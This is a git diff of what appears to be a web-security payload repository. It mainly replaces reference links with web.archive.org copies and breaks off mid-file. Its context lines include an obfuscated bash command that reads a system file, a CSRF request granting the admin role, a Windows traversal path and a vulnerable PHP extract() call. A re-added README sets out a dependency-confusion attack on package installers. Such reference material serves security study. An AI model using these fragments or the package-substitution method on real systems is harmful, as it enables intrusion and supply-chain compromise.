-* [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - 02 Jul 2024](https://blog.doyensec.com/2024/07/02/cspt2csrf.html)
-* [Exploiting Client-Side Path Traversal - CSRF is dead, long live CSRF - Whitepaper - Maxence Schmitt - 02 Jul 2024](https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_Whitepaper.pdf)
-* [Exploiting Client-Side Path Traversal - CSRF is Dead, Long Live CSRF - OWASP Global AppSec 2024 - Maxence Schmitt - June 24 2024](https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_OWASP_Appsec_Lisbon.pdf)
-* [Leaking Jupyter instance auth token chaining CVE-2023-39968, CVE-2024-22421 and a chromium bug - Davwwwx - 30-08-2023](https://blog.xss.am/2023/08/cve-2023-39968-jupyter-token-leak/)
-* [On-site request forgery - Dafydd Stuttard - 03 May 2007](https://portswigger.net/blog/on-site-request-forgery)
-* [Bypassing WAFs to Exploit CSPT Using Encoding Levels - Matan Berson - 2024-05-10](https://matanber.com/blog/cspt-levels)
-* [Automating Client-Side Path Traversals Discovery - Vitor Falcao - October 3, 2024](https://vitorfalcao.com/posts/automating-cspt-discovery/)
-* [CSPT the Eval Villain Way! - Dennis Goodlett - December 3, 2024](https://blog.doyensec.com/2024/12/03/cspt-with-eval-villain.html)
-* [Bypassing File Upload Restrictions To Exploit Client-Side Path Traversal - Maxence Schmitt - January 9, 2025](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
+* [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - 02 Jul 2024](https://web.archive.org/web/20260222183040/https://blog.doyensec.com/2024/07/02/cspt2csrf.html)
+* [Exploiting Client-Side Path Traversal - CSRF is dead, long live CSRF - Whitepaper - Maxence Schmitt - 02 Jul 2024](https://web.archive.org/web/20240702212818/https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_Whitepaper.pdf)
+* [Exploiting Client-Side Path Traversal - CSRF is Dead, Long Live CSRF - OWASP Global AppSec 2024 - Maxence Schmitt - June 24 2024](https://web.archive.org/web/20250521192653/https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_OWASP_Appsec_Lisbon.pdf)
+* [Leaking Jupyter instance auth token chaining CVE-2023-39968, CVE-2024-22421 and a chromium bug - Davwwwx - 30-08-2023](https://web.archive.org/web/20240703155707/https://blog.xss.am/2023/08/cve-2023-39968-jupyter-token-leak/)
+* [On-site request forgery - Dafydd Stuttard - 03 May 2007](https://web.archive.org/web/20260212042947/https://portswigger.net/blog/on-site-request-forgery)
+* [Bypassing WAFs to Exploit CSPT Using Encoding Levels - Matan Berson - 2024-05-10](https://web.archive.org/web/20240512110749/https://matanber.com/blog/cspt-levels)
+* [Automating Client-Side Path Traversals Discovery - Vitor Falcao - October 3, 2024](https://web.archive.org/web/20241004042613/https://vitorfalcao.com/posts/automating-cspt-discovery/)
+* [CSPT the Eval Villain Way! - Dennis Goodlett - December 3, 2024](https://web.archive.org/web/20241203171704/https://blog.doyensec.com/2024/12/03/cspt-with-eval-villain.html)
+* [Bypassing File Upload Restrictions To Exploit Client-Side Path Traversal - Maxence Schmitt - January 9, 2025](https://web.archive.org/web/20250109093347/https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
diff --git a/Command Injection/README.md b/Command Injection/README.md
index 1c05437..40394b2 100644
--- a/Command Injection/README.md	
+++ b/Command Injection/README.md	
@@ -464,13 +464,13 @@ g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
 
 ## References
 
-* [Argument Injection and Getting Past Shellwords.escape - Etienne Stalmans - November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/)
-* [Argument Injection Vectors - SonarSource - February 21, 2023](https://sonarsource.github.io/argument-injection-vectors/)
-* [Back to the Future: Unix Wildcards Gone Wild - Leon Juranic - June 25, 2014](https://www.exploit-db.com/papers/33930)
-* [Bash Obfuscation by String Manipulation - Malwrologist, @DissectMalware - August 4, 2018](https://twitter.com/DissectMalware/status/1025604382644232192)
+* [Argument Injection and Getting Past Shellwords.escape - Etienne Stalmans - November 24, 2019](https://web.archive.org/web/20250306133700/https://staaldraad.github.io/post/2019-11-24-argument-injection/)
+* [Argument Injection Vectors - SonarSource - February 21, 2023](https://web.archive.org/web/20251211212046/https://sonarsource.github.io/argument-injection-vectors/)
+* [Back to the Future: Unix Wildcards Gone Wild - Leon Juranic - June 25, 2014](https://web.archive.org/web/20140714140437/http://www.exploit-db.com/papers/33930)
+* [Bash Obfuscation by String Manipulation - Malwrologist, @DissectMalware - August 4, 2018](https://web.archive.org/web/20241202133053/https://twitter.com/DissectMalware/status/1025604382644232192)
 * [Bug Bounty Survey - Windows RCE Spaceless - Bug Bounties Survey - May 4, 2017](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
-* [No PHP, No Spaces, No $, No {}, Bash Only - Sven Morgenroth - August 9, 2017](https://twitter.com/asdizzle_/status/895244943526170628)
-* [OS Command Injection - PortSwigger - 2024](https://portswigger.net/web-security/os-command-injection)
-* [SECURITY CAFÉ - Exploiting Timed-Based RCE - Pobereznicenco Dan - February 28, 2017](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
+* [No PHP, No Spaces, No $, No {}, Bash Only - Sven Morgenroth - August 9, 2017](https://web.archive.org/web/20220428000241/https://twitter.com/asdizzle_/status/895244943526170628)
+* [OS Command Injection - PortSwigger - 2024](https://web.archive.org/web/20190330193912/https://portswigger.net/web-security/os-command-injection)
+* [SECURITY CAFÉ - Exploiting Timed-Based RCE - Pobereznicenco Dan - February 28, 2017](https://web.archive.org/web/20250108174818/https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
 * [TL;DR: How to Exploit/Bypass/Use PHP escapeshellarg/escapeshellcmd Functions - kacperszurek - April 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
-* [WorstFit: Unveiling Hidden Transformers in Windows ANSI! - Orange Tsai - January 10, 2025](https://blog.orange.tw/posts/2025-01-worstfit-unveiling-hidden-transformers-in-windows-ansi/)
+* [WorstFit: Unveiling Hidden Transformers in Windows ANSI! - Orange Tsai - January 10, 2025](https://web.archive.org/web/20250109163006/https://blog.orange.tw/posts/2025-01-worstfit-unveiling-hidden-transformers-in-windows-ansi/)
diff --git a/Cross-Site Request Forgery/README.md b/Cross-Site Request Forgery/README.md
index 8c10fe2..f6558ef 100644
--- a/Cross-Site Request Forgery/README.md	
+++ b/Cross-Site Request Forgery/README.md	
@@ -146,17 +146,17 @@ xhr.send('{"role":admin}');
 
 ## References
 
-* [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
-* [Cross-Site Request Forgery (CSRF) - OWASP - Apr 19, 2024](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
-* [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton - July 26, 2015](https://whitton.io/articles/messenger-site-wide-csrf/)
+* [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://web.archive.org/web/20220926223539/https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
+* [Cross-Site Request Forgery (CSRF) - OWASP - Apr 19, 2024](https://web.archive.org/web/20120920091432/https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
+* [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton - July 26, 2015](https://web.archive.org/web/20170919181010/https://whitton.io/articles/messenger-site-wide-csrf/)
 * [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial - 19 July 2016](https://web.archive.org/web/20170607102958/https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/)
 * [Hacking PayPal Accounts with one click (Patched) - Yasser Ali - 2014/10/09](https://web.archive.org/web/20141203184956/http://yasserali.com/hacking-paypal-accounts-with-one-click/)
-* [Add tweet to collection CSRF - Vijay Kumar (indoappsec) - November 21, 2015](https://hackerone.com/reports/100820)
+* [Add tweet to collection CSRF - Vijay Kumar (indoappsec) - November 21, 2015](https://web.archive.org/web/20250519092910/https://hackerone.com/reports/100820)
 * [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd - October 16, 2015](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/)
-* [How I Hacked Your Beats Account? Apple Bug Bounty - @aaditya_purani - 2016/07/20](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/)
-* [FORM POST JSON: JSON CSRF on POST Heartbeats API - Eugene Yakovchuk - July 2, 2017](https://hackerone.com/reports/245346)
-* [Hacking Facebook accounts using CSRF in Oculus-Facebook integration - Josip Franjkovic - January 15th, 2018](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
-* [Cross Site Request Forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
-* [Cross-Site Request Forgery Attack - PwnFunction - 5 Apr. 2019](https://www.youtube.com/watch?v=eWEgUcHPle0)
-* [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
-* [Bypass Referer Check Logic for CSRF - hahwul - Oct 11, 2019](https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/)
+* [How I Hacked Your Beats Account? Apple Bug Bounty - @aaditya_purani - 2016/07/20](https://web.archive.org/web/20250504102847/https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/)
+* [FORM POST JSON: JSON CSRF on POST Heartbeats API - Eugene Yakovchuk - July 2, 2017](https://web.archive.org/web/20180102010752/https://hackerone.com/reports/245346)
+* [Hacking Facebook accounts using CSRF in Oculus-Facebook integration - Josip Franjkovic - January 15th, 2018](https://web.archive.org/web/20260208211335/https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
+* [Cross Site Request Forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](https://web.archive.org/web/20250906213239/https://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
+* [Cross-Site Request Forgery Attack - PwnFunction - 5 Apr. 2019](https://web.archive.org/web/20251127000352/https://www.youtube.com/watch?v=eWEgUcHPle0)
+* [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](https://web.archive.org/web/20250727045637/https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
+* [Bypass Referer Check Logic for CSRF - hahwul - Oct 11, 2019](https://web.archive.org/web/20250719144921/https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/)
diff --git a/DOM Clobbering/README.md b/DOM Clobbering/README.md
index 93304d1..67cbedf 100644
--- a/DOM Clobbering/README.md	
+++ b/DOM Clobbering/README.md	
@@ -138,8 +138,8 @@ Exploitation requires any kind of `HTML injection` in the page.
 
 ## References
 
-- [Bypassing CSP via DOM clobbering - Gareth Heyes - 05 June 2023](https://portswigger.net/research/bypassing-csp-via-dom-clobbering)
-- [DOM Clobbering - HackTricks - January 27, 2023](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-clobbering)
-- [DOM Clobbering - PortSwigger - September 25, 2020](https://portswigger.net/web-security/dom-based/dom-clobbering)
-- [DOM Clobbering strikes back - Gareth Heyes - 06 February 2020](https://portswigger.net/research/dom-clobbering-strikes-back)
-- [Hijacking service workers via DOM Clobbering - Gareth Heyes - 29 November 2022](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
+- [Bypassing CSP via DOM clobbering - Gareth Heyes - 05 June 2023](https://web.archive.org/web/20251114182213/https://portswigger.net/research/bypassing-csp-via-dom-clobbering)
+- [DOM Clobbering - HackTricks - January 27, 2023](https://web.archive.org/web/20241215205040/https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-clobbering)
+- [DOM Clobbering - PortSwigger - September 25, 2020](https://web.archive.org/web/20260218083100/https://portswigger.net/web-security/dom-based/dom-clobbering)
+- [DOM Clobbering strikes back - Gareth Heyes - 06 February 2020](https://web.archive.org/web/20200224065316/https://portswigger.net/research/dom-clobbering-strikes-back)
+- [Hijacking service workers via DOM Clobbering - Gareth Heyes - 29 November 2022](https://web.archive.org/web/20260123013910/https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
diff --git a/Denial of Service/README.md b/Denial of Service/README.md
index 1314e7d..897d0d1 100644
--- a/Denial of Service/README.md	
+++ b/Denial of Service/README.md	
@@ -97,5 +97,5 @@ Depending on the technology used by the website, an attacker may have the abilit
 
 ## References
 
-* [DEF CON 32 - Practical Exploitation of DoS in Bug Bounty - Roni Lupin Carta - October 16, 2024](https://youtu.be/b7WlUofPJpU)
-* [Denial of Service Cheat Sheet - OWASP Cheat Sheet Series - July 16, 2019](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html)
+* [DEF CON 32 - Practical Exploitation of DoS in Bug Bounty - Roni Lupin Carta - October 16, 2024](https://web.archive.org/web/20241115121102/https://youtu.be/b7WlUofPJpU)
+* [Denial of Service Cheat Sheet - OWASP Cheat Sheet Series - July 16, 2019](https://web.archive.org/web/20260303124303/https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html)
diff --git a/Dependency Confusion/README.md b/Dependency Confusion/README.md
index 80df9b2..02e2e0a 100644
--- a/Dependency Confusion/README.md	
+++ b/Dependency Confusion/README.md	
@@ -1,39 +1,39 @@
-# Dependency Confusion
-
-> A dependency confusion attack or supply chain substitution attack occurs when a software installer script is tricked into pulling a malicious code file from a public repository instead of the intended file of the same name from an internal repository.
-
-## Summary
-
-* [Tools](#tools)
-* [Methodology](#methodology)
-    * [NPM Example](#npm-example)
-* [References](#references)
-
-## Tools
-
-* [visma-prodsec/confused](https://github.com/visma-prodsec/confused) - Tool to check for dependency confusion vulnerabilities in multiple package management systems
-* [synacktiv/DepFuzzer](https://github.com/synacktiv/DepFuzzer) - Tool used to find dependency confusion or project where owner's email can be takeover.
-
-## Methodology
-
-Look for `npm`, `pip`, `gem` packages, the methodology is the same : you register a public package with the same name of private one used by the company and then you wait for it to be used.
-
-* **DockerHub**: Dockerfile image
-* **JavaScript** (npm): package.json
-* **MVN** (maven): pom.xml
-* **PHP** (composer): composer.json
-* **Python** (pypi): requirements.txt
-
-### NPM Example
-
-* List all the packages (ie: package.json, composer.json, ...)
-* Find the package missing from [www.npmjs.com](https://www.npmjs.com/)
-* Register and create a **public** package with the same name
-    * Package example : [0xsapra/dependency-confusion-expoit](https://github.com/0xsapra/dependency-confusion-expoit)
-
-## References
-
-* [Exploiting Dependency Confusion - Aman Sapra (0xsapra) - 2 Jul 2021](https://0xsapra.github.io/website//Exploiting-Dependency-Confusion)
-* [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - 9 Feb 2021](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
-* [3 Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - 29/03/2021](https://web.archive.org/web/20210210121930/https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/)
-* [$130,000+ Learn New Hacking Technique in 2021 - Dependency Confusion - Bug Bounty Reports Explained - 22 févr. 2021](https://www.youtube.com/watch?v=zFHJwehpBrU)
+# Dependency Confusion
+
+> A dependency confusion attack or supply chain substitution attack occurs when a software installer script is tricked into pulling a malicious code file from a public repository instead of the intended file of the same name from an internal repository.
+
+## Summary
+
+* [Tools](#tools)
+* [Methodology](#methodology)
+    * [NPM Example](#npm-example)
+* [References](#references)
+
+## Tools
+
+* [visma-prodsec/confused](https://github.com/visma-prodsec/confused) - Tool to check for dependency confusion vulnerabilities in multiple package management systems
+* [synacktiv/DepFuzzer](https://github.com/synacktiv/DepFuzzer) - Tool used to find dependency confusion or project where owner's email can be takeover.
+
+## Methodology
+
+Look for `npm`, `pip`, `gem` packages, the methodology is the same : you register a public package with the same name of private one used by the company and then you wait for it to be used.
+
+* **DockerHub**: Dockerfile image
+* **JavaScript** (npm): package.json
+* **MVN** (maven): pom.xml
+* **PHP** (composer): composer.json
+* **Python** (pypi): requirements.txt
+
+### NPM Example
+
+* List all the packages (ie: package.json, composer.json, ...)
+* Find the package missing from [www.npmjs.com](https://www.npmjs.com/)
+* Register and create a **public** package with the same name
+    * Package example : [0xsapra/dependency-confusion-expoit](https://github.com/0xsapra/dependency-confusion-expoit)
+
+## References
+
+* [Exploiting Dependency Confusion - Aman Sapra (0xsapra) - 2 Jul 2021](https://web.archive.org/web/20251107024922/https://0xsapra.github.io/website/Exploiting-Dependency-Confusion)
+* [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - 9 Feb 2021](https://web.archive.org/web/20210209181139/https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
+* [3 Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - 29/03/2021](https://web.archive.org/web/20210210121930/https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/)
+* [$130,000+ Learn New Hacking Technique in 2021 - Dependency Confusion - Bug Bounty Reports Explained - 22 févr. 2021](https://web.archive.org/web/20210223060107/https://www.youtube.com/watch?v=zFHJwehpBrU)
diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md
index a738299..ed3d49f 100644
--- a/Directory Traversal/README.md	
+++ b/Directory Traversal/README.md	
@@ -344,11 +344,11 @@ c:/windows/repair/system
 
 ## References
 
-* [Cookieless ASPNET - Soroush Dalili - March 27, 2023](https://twitter.com/irsdl/status/1640390106312835072)
-* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
-* [Directory traversal - Portswigger - March 30, 2019](https://portswigger.net/web-security/file-path-traversal)
-* [Directory traversal attack - Wikipedia - August 5,  2024](https://en.wikipedia.org/wiki/Directory_traversal_attack)
-* [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - November 30, 2023](https://youtu.be/YlZGJ28By8U)
+* [Cookieless ASPNET - Soroush Dalili - March 27, 2023](https://web.archive.org/web/20241202163755/https://twitter.com/irsdl/status/1640390106312835072)
+* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://web.archive.org/web/20080115180212/http://cwe.mitre.org:80/data/definitions/40.html)
+* [Directory traversal - Portswigger - March 30, 2019](https://web.archive.org/web/20190330191447/https://portswigger.net/web-security/file-path-traversal)
+* [Directory traversal attack - Wikipedia - August 5,  2024](https://web.archive.org/web/20111013162219/http://en.wikipedia.org:80/wiki/Directory_traversal_attack)
+* [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - November 30, 2023](https://web.archive.org/web/20240323234120/https://youtu.be/YlZGJ28By8U)
 * [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos - 19 June 2018](https://web.archive.org/web/20200919055801/http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
 * [NGINX may be protecting your applications from traversal attacks without you even knowing - Rotem Bar - September 24, 2020](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
 * [Path Traversal Cheat Sheet: Windows - @HollyGraceful - May 17, 2015](https://web.archive.org/web/20170123115404/https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
diff --git a/Encoding Transformations/README.md b/Encoding Transformations/README.md
index 6409a85..54c8ee8 100644
--- a/Encoding Transformations/README.md	
+++ b/Encoding Transformations/README.md	
@@ -104,8 +104,8 @@ admin
 
 ## References
 
-* [Puny-Code, 0-Click Account Takeover - Voorivex - June 1, 2025](https://blog.voorivex.team/puny-code-0-click-account-takeover)
-* [Unicode normalization vulnerabilities - Lazar - September 30, 2021](https://lazarv.com/posts/unicode-normalization-vulnerabilities/)
-* [Unicode Normalization Vulnerabilities & the Special K Polyglot - AppCheck - September 2, 2019](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/)
-* [WAF Bypassing with Unicode Compatibility - Jorge Lajara - February 19, 2020](https://jlajara.gitlab.io/Bypass_WAF_Unicode)
-* [When "Zoë" !== "Zoë". Or why you need to normalize Unicode strings - Alessandro Segala - March 11, 2019](https://withblue.ink/2019/03/11/why-you-need-to-normalize-unicode-strings.html)
+* [Puny-Code, 0-Click Account Takeover - Voorivex - June 1, 2025](https://web.archive.org/web/20251211233427/https://blog.voorivex.team/puny-code-0-click-account-takeover)
+* [Unicode normalization vulnerabilities - Lazar - September 30, 2021](https://web.archive.org/web/20251224043224/https://lazarv.com/posts/unicode-normalization-vulnerabilities/)
+* [Unicode Normalization Vulnerabilities & the Special K Polyglot - AppCheck - September 2, 2019](https://web.archive.org/web/20190916002602/https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/)
+* [WAF Bypassing with Unicode Compatibility - Jorge Lajara - February 19, 2020](https://web.archive.org/web/20251230185141/https://jlajara.gitlab.io/Bypass_WAF_Unicode)
+* [When "Zoë" !== "Zoë". Or why you need to normalize Unicode strings - Alessandro Segala - March 11, 2019](https://web.archive.org/web/20260128220322/https://withblue.ink/2019/03/11/why-you-need-to-normalize-unicode-strings.html)
diff --git a/External Variable Modification/README.md b/External Variable Modification/README.md
index e3da1f0..cd8b2c4 100644
--- a/External Variable Modification/README.md	
+++ b/External Variable Modification/README.md	
@@ -90,9 +90,9 @@ extract($_GET, EXTR_SKIP);
 
 ## References
 
-* [CWE-473: PHP External Variable Modification - Common Weakness Enumeration - November 19, 2024](https://cwe.mitre.org/data/definitions/473.html)
-* [CWE-621: Variable Extraction Error - Common Weakness Enumeration - November 19, 2024](https://cwe.mitre.org/data/definitions/621.html)
-* [Function extract - PHP Documentation - March 21, 2001](https://www.php.net/manual/en/function.extract.php)
-* [$GLOBALS variables - PHP Documentation - April 30, 2008](https://www.php.net/manual/en/reserved.variables.globals.php)
+* [CWE-473: PHP External Variable Modification - Common Weakness Enumeration - November 19, 2024](https://web.archive.org/web/20260210044429/https://cwe.mitre.org/data/definitions/473.html)
+* [CWE-621: Variable Extraction Error - Common Weakness Enumeration - November 19, 2024](https://web.archive.org/web/20260223131419/https://cwe.mitre.org/data/definitions/621.html)
+* [Function extract - PHP Documentation - March 21, 2001](https://web.archive.org/web/20260210044429/https://www.php.net/manual/en/function.extract.php)
+* [$GLOBALS variables - PHP Documentation - April 30, 2008](https://web.archive.org/web/20260307071107/https://www.php.net/manual/en/reserved.variables.globals.php)
 * [The Ducks - HackThisSite - December 14, 2016](https://github.com/HackThisSite/CTF-Writeups/blob/master/2016/SCTF/Ducks/README.md)
-* [Extracttheflag! - Orel / WindTeam - February 28, 2024](https://ctftime.org/writeup/38076)
+* [Extracttheflag! - Orel / WindTeam - February 28, 2024](https://web.archive.org/web/20250709004721/https://ctftime.org/writeup/38076)
diff --git a/File Inclusion/LFI-to-RCE.md b/File Inclusion/LFI-to-RCE.md
index 8e1448b..39cadbc 100644
--- a/File Inclusion/LFI-to-RCE.md	
+++ b/File Inclusion/LFI-to-RCE.md	
@@ -295,9 +295,9 @@ If SSH is active, check which user is being used in the machine by including the
 
 ## References
 
-- [LFI WITH PHPINFO() ASSISTANCE - Brett Moore - September 2011](https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf)
-- [LFI2RCE via PHP Filters - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
-- [Local file inclusion tricks - Johan Adriaans - August 4, 2007](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)
-- [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - Gynvael Coldwind - March 18, 2011](https://gynvael.coldwind.pl/?id=376)
-- [PHP LFI with Nginx Assistance - Bruno Bierbaumer - 26 Dec 2021](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
+- [LFI WITH PHPINFO() ASSISTANCE - Brett Moore - September 2011](https://web.archive.org/web/20170406225317/https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf)
+- [LFI2RCE via PHP Filters - HackTricks - July 19, 2024](https://web.archive.org/web/20220819000915/https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters)
+- [Local file inclusion tricks - Johan Adriaans - August 4, 2007](https://web.archive.org/web/20250403080651/http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)
+- [PHP LFI to arbitrary code execution via rfc1867 file upload temporary files (EN) - Gynvael Coldwind - March 18, 2011](https://web.archive.org/web/20110429042455/http://gynvael.coldwind.pl:80/?id=376)
+- [PHP LFI with Nginx Assistance - Bruno Bierbaumer - 26 Dec 2021](https://web.archive.org/web/20250604035904/https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
 - [Upgrade from LFI to RCE via PHP Sessions - Reiners - September 14, 2017](https://web.archive.org/web/20170914211708/https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/)
diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index c2b4172..0defb0f 100644
--- a/File Inclusion/README.md	
+++ b/File Inclusion/README.md	
@@ -137,9 +137,9 @@ When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still pos
 
 ## References
 
-- [CVV #1: Local File Inclusion - SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
-- [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - 2019-05-12](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
-- [Is PHP vulnerable and under what conditions? - April 13, 2015 - Andreas Venieris](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
-- [LFI Cheat Sheet - @Arr0way - 24 Apr 2016](https://highon.coffee/blog/lfi-cheat-sheet/)
-- [Testing for Local File Inclusion - OWASP - 25 June 2017](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
+- [CVV #1: Local File Inclusion - SI9INT - Jun 20, 2018](https://web.archive.org/web/20200724150218/https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
+- [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction - Mannu Linux - 2019-05-12](https://web.archive.org/web/20260220172333/https://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html)
+- [Is PHP vulnerable and under what conditions? - April 13, 2015 - Andreas Venieris](https://web.archive.org/web/20250209181954/http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
+- [LFI Cheat Sheet - @Arr0way - 24 Apr 2016](https://web.archive.org/web/20180121083456/https://highon.coffee/blog/lfi-cheat-sheet/)
+- [Testing for Local File Inclusion - OWASP - 25 June 2017](https://web.archive.org/web/20131021005706/https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
 - [Turning LFI into RFI - Grayson Christopher - 2017-08-14](https://web.archive.org/web/20170815004721/https://l.avala.mp/?p=241)
diff --git a/File Inclusion/Wrappers.md b/File Inclusion/Wrappers.md
index 1a83849..48f63ee 100644
--- a/File Inclusion/Wrappers.md	
+++ b/File Inclusion/Wrappers.md	
@@ -265,11 +265,11 @@ code remote.py # edit Remote.oracle
 
 - [Baby^H Master PHP 2017 - Orange Tsai (@orangetw) - Dec 5, 2021](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017)
 - [Iconv, set the charset to RCE: exploiting the libc to hack the php engine (part 1) - Charles Fol - May 27, 2024](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)
-- [Introducing lightyear: a new way to dump PHP files - Charles Fol - November 4, 2024](https://www.ambionics.io/blog/lightyear-file-dump)
+- [Introducing lightyear: a new way to dump PHP files - Charles Fol - November 4, 2024](https://web.archive.org/web/20250809094219/https://www.ambionics.io/blog/lightyear-file-dump)
 - [Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix - Charles Fol - December 11, 2023](https://www.ambionics.io/blog/wrapwrap-php-filters-suffix)
 - [It's A PHP Unserialization Vulnerability Jim But Not As We Know It - Sam Thomas - August 10, 2018](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
 - [New PHP Exploitation Technique - Dr. Johannes Dahse - August 14, 2018](https://web.archive.org/web/20180817103621/https://blog.ripstech.com/2018/new-php-exploitation-technique/)
 - [OffensiveCon24 - Charles Fol- Iconv, Set the Charset to RCE - June 14, 2024](https://youtu.be/dqKFHjcK9hM)
-- [PHP FILTER CHAINS: FILE READ FROM ERROR-BASED ORACLE - Rémi Matasse - March 21, 2023](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html)
-- [PHP FILTERS CHAIN: WHAT IS IT AND HOW TO USE IT - Rémi Matasse - October 18, 2022](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)
